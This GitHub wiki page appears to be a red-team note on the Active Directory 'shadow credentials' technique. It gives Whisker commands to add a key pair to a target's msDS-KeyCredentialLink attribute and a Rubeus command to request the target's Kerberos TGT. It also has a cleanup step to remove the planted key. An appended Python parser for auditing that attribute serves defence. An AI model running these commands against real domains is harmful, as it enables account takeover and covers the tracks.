Shadow credentials - CraigDonkin/Infrastructure GitHub Wiki

This technique requires the following:

  • At least one Windows Server 2016 Domain Controller.

  • A digital certificate for Server Authentication installed on the Domain Controller.

  • Windows Server 2016 Functional Level in Active Directory.

  • A compromised account that holds delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.

  • High level overview of the attack: write to the msDS-KeyCredentialLink attribute of the target object and add a shadow credential (a new key pair) for that account.

  • The target account's TGT is then retrieved using that shadow credential.

  • Then use the TGT for something malicious.

Step One - Whisker

https://github.com/eladshamir/Whisker

  • List keys that are already present for a target:
    Whisker.exe list /target:<target>
  • Add a new key pair to the target:
    Whisker.exe add /target:<target>
  • Confirm the msDS-KeyCredentialLink attribute was written to (PowerView):
    Get-NetComputer <target>

Step two - Rubeus

  • Run the Rubeus command detailed by Whisker:
    Rubeus.exe asktgt /user:<target> /certificate:<certificate> /password:<password> /domain:<domain> /dc:<dc> /getcredentials /show /nowrap

Step three - Clean up

  • Get the DeviceID of the key that was added:
    Whisker.exe list /target:<target>
  • Remove it:
    Whisker.exe remove /target:<target> /deviceid:<deviceid>
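The attribute the attacker writes in step one is also what a defender audits: every entry in msDS-KeyCredentialLink carries a DeviceId and creation time that can be compared against legitimate Windows Hello / device enrolments, and an entry that nobody enrolled is the artefact this technique leaves behind even after the TGT is gone. The Python below is an added example, not part of this wiki or of Whisker/Rubeus; it parses one msDS-KeyCredentialLink value as exported from LDAP (DN-Binary string `B:<hexlen>:<hex>:<DN>`) into its KEYCREDENTIALLINK_BLOB entries as laid out in MS-ADTS 2.2.20, and the sample value it checks is constructed in code rather than taken from a real directory.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Entry identifiers of KEYCREDENTIALLINK_ENTRY (MS-ADTS 2.2.20.3)
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME counts 100 ns ticks from here

def parse_key_credential_link(dn_binary: str) -> dict:
    """Parse one msDS-KeyCredentialLink value in DN-Binary form 'B:<hexlen>:<hex>:<DN>'."""
    prefix, hex_len, hex_blob, dn = dn_binary.split(":", 3)
    if prefix != "B" or int(hex_len) != len(hex_blob):
        raise ValueError("malformed DN-Binary value")
    blob = bytes.fromhex(hex_blob)
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unsupported KEYCREDENTIALLINK_BLOB version {version:#x}")
    parsed, offset = {"dn": dn}, 4
    while offset < len(blob):  # each entry: uint16 length, uint8 identifier, value bytes
        length, ident = struct.unpack_from("<HB", blob, offset)
        value = blob[offset + 3:offset + 3 + length]
        offset += 3 + length
        name = ENTRY_NAMES.get(ident, f"Unknown{ident:#x}")
        if ident == 0x06:
            parsed[name] = str(uuid.UUID(bytes_le=value))  # DeviceId is a little-endian GUID
        elif ident in (0x08, 0x09):
            parsed[name] = FILETIME_EPOCH + timedelta(microseconds=struct.unpack("<Q", value)[0] // 10)
        elif ident == 0x04:
            parsed[name] = value[0]  # 0x01 = KeyUsageNGC, the usage Windows Hello keys carry
        else:
            parsed[name] = value.hex()
    return parsed

def build_sample_value(device_id: str, created_iso: str, dn: str) -> str:
    """Constructed test value (not a real directory export) in the same DN-Binary encoding."""
    delta = datetime.fromisoformat(created_iso) - FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    entries = [
        (0x04, b"\x01"),                        # KeyUsage = NGC
        (0x06, uuid.UUID(device_id).bytes_le),  # DeviceId
        (0x09, struct.pack("<Q", ticks)),       # KeyCreationTime as FILETIME
    ]
    blob = struct.pack("<I", 0x200) + b"".join(struct.pack("<HB", len(v), i) + v for i, v in entries)
    return f"B:{len(blob.hex())}:{blob.hex()}:{dn}"
```

Run the parser over every value of the attribute across the domain and flag a DeviceId that does not appear in your device enrolment records, or a KeyCreationTime that does not line up with a known enrolment.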